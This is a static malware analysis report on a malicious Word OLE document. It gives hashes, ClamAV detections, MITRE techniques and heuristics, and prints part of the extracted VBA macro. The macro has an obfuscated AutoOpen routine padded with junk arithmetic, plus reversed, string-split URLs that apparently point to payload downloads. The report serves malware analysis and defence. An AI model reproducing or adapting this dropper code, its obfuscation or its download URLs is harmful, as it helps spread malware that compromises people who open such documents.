Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2070ccdc16d4bbf2…

MALICIOUS

Office (OLE)

223.0 KB First seen: 2018-02-19
MD5: e083e0a82522bedb1678fb66d42e75bb SHA-1: d4cbc7d662eba95d627c8f2ea9c2231a057a0ea6 SHA-256: 2070ccdc16d4bbf23d00738a905dc114ff8ae2303ea76baab0061858324f2fe7
302 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is a malicious OLE document containing a VBA macro. The macro uses the AutoOpen function and the Shell() function, indicating an attempt to execute arbitrary code. ClamAV detections further confirm its malicious nature as a dropper and phishing lure. The VBA macro is obfuscated, but its intent to execute a payload is clear.

Heuristics 7

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 81857 bytes
SHA-256: 69fcf820191916e90d44279a9aa35005f524a950f6bf7ccdd8f0b451e2371310
Detection
ClamAV: Doc.Trojan.Obfuscated-6443078-0
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "iWjWJPS"
Sub AutoOpen()
On Error Resume Next
kdJfEpdOF = 3252751 - Sqr(hOGfMYjNQW * Fix(SktdNzsHGim) + 3909061 / sIpVTzMp) - 1201634 * hZwUUzhufw * LYmacfVz + CDbl(1917879 * Int(8878754) / 8915330 * Tan(8840182)) / mEjLuQJnMLLEQc / CByte(4596507 - CDbl(ZjHYAhjC))
uqUqswfnf = 9478693 - Sqr(QPVAOmTwNbWM * Fix(wpkKmVw) + 992166 / jRDwSvQfXZ) - 3727170 * HsEjtlhiVbYiRs * MVAJwcv + CDbl(6846736 * Int(866509) / 9439246 * Tan(3468441)) / XiiDwsHqzj / CByte(5234351 - CDbl(kRWzEsZfZtEKWQ))
USMIzmbQJ = 122224 - Sqr(XblJCFfuHYhGv * Fix(LXmuiiXjjXp) + 5816349 / jpSTHVMjRnVXn) - 4669228 * PrmLQdnOo * fWPrvNTYQz + CDbl(926028 * Int(7753823) / 1022828 * Tan(5112287)) / jwukQXqFHQpl / CByte(5818131 - CDbl(Ksbizbzwp))
VZCzWYLbl = 2378926 - Sqr(jftdXwoQHaF * Fix(pKGGdJHwmmI) + 4718136 / OYUjvpDY) - 739326 * fzzHwnioOPwM * QShRdNotWUSIa + CDbl(3905174 * Int(6870105) / 2286215 * Tan(7231504)) / ElcbHjC / CByte(1772200 - CDbl(DzuIOCjD))
OOXZLPnIi = 5991545 - Sqr(YSwddNsbMoKBPU * Fix(kvcMDGq) + 3144175 / zOdsWoSdBD) - 7065432 * EURvWaXPEMIEJ * sjRbshCdfOk + CDbl(9896094 * Int(965442) / 4493605 * Tan(4249892)) / ALjIfaLRhfTB / CByte(3242878 - CDbl(GYjrwmLZLDqb))
pCKWVzsXL = 9363727 - Sqr(AwRUAtNOBM * Fix(ILPNajVazjSElJ) + 1202207 / JTItZJDi) - 8577107 * SLjwopOvtzG * ZJBlwniu + CDbl(6258488 * Int(2225436) / 8910391 * Tan(6590767)) / usSVwIh / CByte(4033711 - CDbl(RKuBsdqpPHEBuw))
Application.Run "NLUYVDimiiD", RLzdaAFz
soMPAwwGQ = 9617815 - Sqr(uwvavqZndsrqvv * Fix(EqwndCz) + 8823366 / jlsjWzKtwGz) - 6234099 * PUQfNRGBzRUuuH * dUsuCUtJ + CDbl(9709737 * Int(8552982) / 3219678 * Tan(6171451)) / ztozYJbcWwoi / CByte(7590964 - CDbl(jUYmcpAPcO))
DdZVKRmwl = 4735044 - Sqr(DdWVkfh * Fix(VDLPvKpa) + 1244114 / qhhRZuvjFRELr) - 9563641 * WfqBQrJSJ * LrOiLVrj + CDbl(1665327 * Int(8977275) / 8322224 * Tan(4143412)) / EbaBaQBJLNAY / CByte(5802716 - CDbl(YqwjOYLOCjEtwN))
fjDXAumap = 8171649 - Sqr(CHwzdOGhWTpM * Fix(cwapYtwjU) + 7805832 / cKcXkMzAGzM) - 3383456 * OYSwMZupX * vDTwBvuDhSSXT + CDbl(7165641 * Int(6548261) / 9519527 * Tan(1942707)) / oFQPfMazbz / CByte(3860804 - CDbl(uoFVhTQPwFMuiz))
wrFhQOPYA = 3324598 - Sqr(fYHVCUwjnY * Fix(RzDOjuZjtWl) + 6187224 / jttjFfVno) - 9519534 * vJttkPK * bSZIdCiVzRXBu + CDbl(8568941 * Int(8371902) / 7413642 * Tan(1601080)) / PdICqdzBSXA / CByte(6028819 - CDbl(iLtFzJlPiXKWWQ))
vICRHlJzh = 6755471 - Sqr(bwIcjKUUSt * Fix(AntdXLlGwjUND) + 8639435 / FttpiiKjV) - 2518621 * muMpCDXGHPX * OwOaksHjEjT + CDbl(989227 * Int(5226202) / 5074258 * Tan(5634398)) / LpGYQuYrt / CByte(1653083 - CDbl(QpzlAhPfqQD))
ZnOdXDaHO = 5332630 - Sqr(IuSIzOUZWhc * Fix(rtHwSXLvm) + 9609761 / QSJmWVQm) - 8884543 * qjCSshB * QtWzZXkQ + CDbl(825167 * Int(1447742) / 6916433 * Tan(465977)) / nLnCppbzEFu / CByte(6570041 - CDbl(BNEfapKk))
End Sub
Function RLzdaAFz()
On Error Resume Next
qwLQJ = ("cwrJeQx+eQxceQx+eQxa'+'eQx+eQx//:peQx+eQxtteQx+e'+'Qxh?/kJ3wEe/moceQx+eQx.pohseQx+e'+'QxirteQx+eQxap//DZitmPGAqnm")
uYTTC = 9875772 - Sqr(LcjrBiz * Fix(FiFzPmcjS) + 5710793 / TMiWbiqjiGk) - 4834923 * MPzhfYd * zQwACfniN + CDbl(7758422 * Int(4583690) / 4417256 * Tan(6881596)) / nhFEILwSKVJ / CByte(416470 - CDbl(ApuDtzRUvfWY))
GViij = 533090 - Sqr(zQSMCTj * Fix(QbbQSOjGcqA) + 8906389 / tTkiXSLrBjjG) - 1583944 * BsJHjFZ * ScdhDnpDfX + CDbl(1626700 * Int(3074142) / 799501 * Tan(9499630)) / hiAUjPsvKKNi / CByte(2762942 - CDbl(jRpNVBIBq))
aWzOjrj = Mid(qwLQJ, 5, 98)
XiYuNKLwvS = ("V?eQx+eQx/POeQx+eQxdCm/eQx+eQxmoceQx+eQx.sseQx+eQxecorp-eQx+eQxdraobeQx+eQxno//:p'+'tteQx+eQxh?/FszkXLVLCHOjpFcDvoWjGq")
BkuHqRFaVMr = 474799 - Sqr(licDRSwSnRQU * Fix(jcPCjDXRiQLqn) + 7512926 / SkHBpEJYbTREuX) - 6885760 * OCfRVFJACfPGSQ * ifzzCKOil + CDbl(4465664 * Int(808238) / 7627818 * Tan(6576659)) / wcuvTznIV / CByte(5372122 - CDbl(bGwKpCGLG))
TiqwWjZNTQU = 74438
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.